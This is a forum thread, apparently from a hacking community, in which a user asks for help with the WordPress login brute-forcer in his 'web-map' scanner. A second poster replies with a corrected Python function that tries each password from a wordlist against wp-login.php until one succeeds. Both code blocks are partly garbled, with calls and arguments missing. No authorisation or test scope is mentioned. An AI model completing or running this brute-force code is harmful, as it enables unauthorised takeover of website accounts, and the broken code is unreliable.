Need some help on my project.

Hi! :)
I’ve been doing a program called web-map.
it scans a website for vulnerabilities.
But I’m having some trouble with brute-forcing the wordpress login.
This is the code which brute-force the login:
```def brute_login(tgt, dictionary):
s = requests.Session()
pass_found = False
user = raw_input("User: ")
intent = 0
tgt = tgt+"/wp-login"
f = open(dictionary, 'r')
for word in f.readlines():
password = word.strip('\n')
payload = {'log': user, 'pwd': password, 'redirect_to': 'TARGET_URL/wp-admin', 'testcookie': '1', 'wp-submit': 'Access'}
print '[+] Trying with user: '+str(user)+' and password: '+str(password)+'\ttry: '+str(intent), data=payload)
data = s.get("").text
if 'Escritorio' in data or 'Desktop' in data:
print '[*] Password found: '+password
pass_found = True
I hope you can help me, Thanks!! :D
Human Stupidity , thats why Hackers always win.
? Med Amine Khelifi

You can see the hole code on
Human Stupidity , thats why Hackers always win.
? Med Amine Khelifi

I don’t think Wordpress is blocking me because I have tried doing only one request with the correct credentials and I still cannot login.
And, how could I check the response to the post with python?
Human Stupidity , thats why Hackers always win.
? Med Amine Khelifi

Ok, I tested your code, and I found what was wrong, and changed some things (for python3 support or cleaner code).
So this works well:
```def brute_login(tgt, dictionary):
s = requests.Session()
# Let wordpress set it's cookies, instead of manually setting them.
user = raw_input("User: ")
intent = 0
tgt = tgt + "/wp-login.php"
passwords = []
#We use a context manager, so that the file is closed.'
with open(dictionary, 'r') as f:
passwords ='\n')
for password in passwords:
intent += 1
payload = {
'log': user,
'pwd': password}
print('[+] Trying with user: {} and password: {}\ttry: {}'.format(
intent)) # Python 3 compatibility
# We use the response object from the post request.
data =, data=payload)
#It's easier to check if we failed.'
if not 'ERROR' in data.text:
print('[*] Password found: {}'.format(password))
break # Cleaner than else: pass```
I added comments, but if you need explanation, feel free to ask.
I am still learning python, so if anyone else finds something wrong with the above function, I will be happy to learn!

Ok thanks, that will help me.
I suggest you to use python 2.7, I think is better than 3.X.
And… Do you have a github account? just for writing on the code that you helped creating it…
Human Stupidity , thats why Hackers always win.
? Med Amine Khelifi